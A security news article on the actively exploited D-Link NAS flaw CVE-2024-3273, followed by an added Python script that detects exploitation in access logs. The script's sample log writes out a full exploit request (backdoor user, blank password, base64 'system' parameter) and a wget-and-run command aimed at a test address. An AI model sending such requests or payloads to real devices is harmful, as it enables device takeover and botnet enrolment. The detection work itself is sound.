A critical flaw in D-Link NAS devices is under active exploitation, with over 92,000 internet-exposed devices vulnerable to remote code execution. No patch is available.
Security researchers report that a critical remote code execution (RCE) vulnerability affecting tens of thousands of D-Link Network Attached Storage (NAS) devices is now being actively exploited.
Critical Flaw in D-Link NAS Allows Arbitrary Command Execution
Discovered by the researcher Netsecfish, the flaw in D-Link NAS devices (CVE-2024-3273) combines two defects: a hard-coded backdoor account with a blank password that lets anyone authenticate to the web interface, and a command injection in the “system” request parameter that lets the authenticated caller execute arbitrary operating-system commands on the device.
Threat actors are chaining the backdoor login with the command injection to deploy variants of the Mirai botnet malware, most likely to enrol the compromised NAS devices in large-scale DDoS botnets.
“The described vulnerability affects multiple D-Link NAS devices, including models DNS-340L, DNS-320L, DNS-327L, and DNS-325, among others,” Netsecfish explains. “Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the system, potentially leading to unauthorized access to sensitive information, modification of system configurations, or denial of service conditions.”
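The exploitation pattern described above leaves a recognisable trace in the NAS web-server access log: a request authenticating as the backdoor account with an empty password, followed (or accompanied) by a request carrying the “system” parameter. The script below is an added detection example written for this page; it is not code from Netsecfish, from D-Link, or from the original article. It assumes, as in the public proof of concept rather than anything stated here, that the vulnerable handler lives at /cgi-bin/nas_sharing.cgi, that the backdoor account is named messagebus, and that the injected command arrives base64-encoded in the system parameter. The log lines are constructed for the example using RFC 5737 test addresses.

```python
"""Flag CVE-2024-3273-style exploitation attempts in a NAS web-server access log."""
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Assumptions, not stated on the page: the vulnerable handler path and the
# backdoor account name, taken from the public proof of concept. Adjust to
# match your firmware and log source.
SUSPECT_PATH = "/cgi-bin/nas_sharing.cgi"
BACKDOOR_USER = "messagebus"

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
SHELL_METACHARS = re.compile(r"[;|&`$(){}<>\n]")


def parse_query(query: str) -> Dict[str, str]:
    """Split a query string without turning '+' into a space.

    urllib.parse.parse_qs does that conversion, which silently corrupts a
    base64 payload containing '+', so the injected command would not decode.
    """
    params: Dict[str, str] = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return params


def decode_system_param(value: str) -> str:
    """Return the decoded command if `system` is valid base64, else the raw value."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return value


def analyse_request(path: str) -> Optional[Dict]:
    """Return a finding for one request path, or None if it looks benign."""
    parts = urlsplit(path)
    if parts.path != SUSPECT_PATH:
        return None
    params = parse_query(parts.query)
    reasons: List[str] = []
    if params.get("user") == BACKDOOR_USER:
        reasons.append("backdoor account")
    if "passwd" in params and params["passwd"] == "":
        reasons.append("blank password")
    command = None
    if "system" in params:
        command = decode_system_param(params["system"])
        reasons.append("system parameter present")
        if SHELL_METACHARS.search(command):
            reasons.append("shell metacharacters in command")
    if not reasons:
        return None
    return {"user": params.get("user", ""), "command": command, "reasons": reasons}


def scan_log(lines: List[str]) -> List[Dict]:
    """Run analyse_request over every parsable log line, keeping hits in order."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not CLF; a real deployment would count these separately
        src, timestamp, method, path, status = match.groups()
        hit = analyse_request(path)
        if hit:
            hit.update(src=src, time=timestamp, method=method, status=int(status))
            findings.append(hit)
    return findings


# Constructed sample log (RFC 5737 test addresses), not real traffic.
_CMD = "cd /tmp; wget http://203.0.113.5/x.sh; sh x.sh"
_ENC = base64.b64encode(_CMD.encode()).decode()
SAMPLE_LOG = [
    f'203.0.113.9 - - [08/Apr/2024:10:14:02 +0000] "GET {SUSPECT_PATH}?user={BACKDOOR_USER}&passwd=&system={_ENC} HTTP/1.1" 200 512',
    f'198.51.100.7 - - [08/Apr/2024:10:15:40 +0000] "GET {SUSPECT_PATH}?user={BACKDOOR_USER}&passwd= HTTP/1.1" 200 88',
    f'192.0.2.44 - - [08/Apr/2024:10:16:01 +0000] "GET {SUSPECT_PATH}?user=admin&passwd=s3cret&dir=%2FVolume_1 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [08/Apr/2024:10:16:30 +0000] "GET /index.html HTTP/1.1" 200 4310',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} user={f['user']!r} {', '.join(f['reasons'])}")
        if f["command"]:
            print(f"    command: {f['command']}")
```

Two caveats for anyone porting this to a SIEM rule: a 200 response does not prove the command ran, so treat a hit as a trigger for host-level triage rather than as confirmed compromise; and never normalise the query string with a parser that maps `+` to a space before decoding, or the base64 command will be mangled and the shell-metacharacter check will miss it.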
Affected Devices and Models
The vulnerability impacts multiple D-Link NAS models, including but not limited to:
Model | End of Service Life
DNS-320L | 05/31/2020
DNS-325 | 09/01/2017
DNS-327L | 05/31/2020
DNS-340L | 07/31/2019
Internet scans found over 92,000 devices of these models still exposed online and vulnerable to exploitation.
No Patch Available Yet!
D-Link initially stated it would not patch the flaw because the affected devices have reached end of life; it later told owners to discontinue use immediately and replace the vulnerable systems. No patch is available.
According to a D-Link spokesperson, the affected NAS devices have no automatic online update or alert mechanism, so D-Link has no way to push either a fix or a warning to the owners of devices under attack.
Following the disclosure, D-Link issued a security advisory on Thursday informing owners of the vulnerability and strongly advising them to retire or replace the affected devices as soon as possible.
D-Link also maintains a support page for legacy devices, but the firmware offered there does not address this flaw, so applying it should not be mistaken for protection against these attacks.
With attacks under way and no patch from D-Link, thousands of devices remain at risk of compromise. Until a fix exists, the only effective mitigation is to take vulnerable devices offline, or at the very least stop exposing their web interface to the internet, and replace them.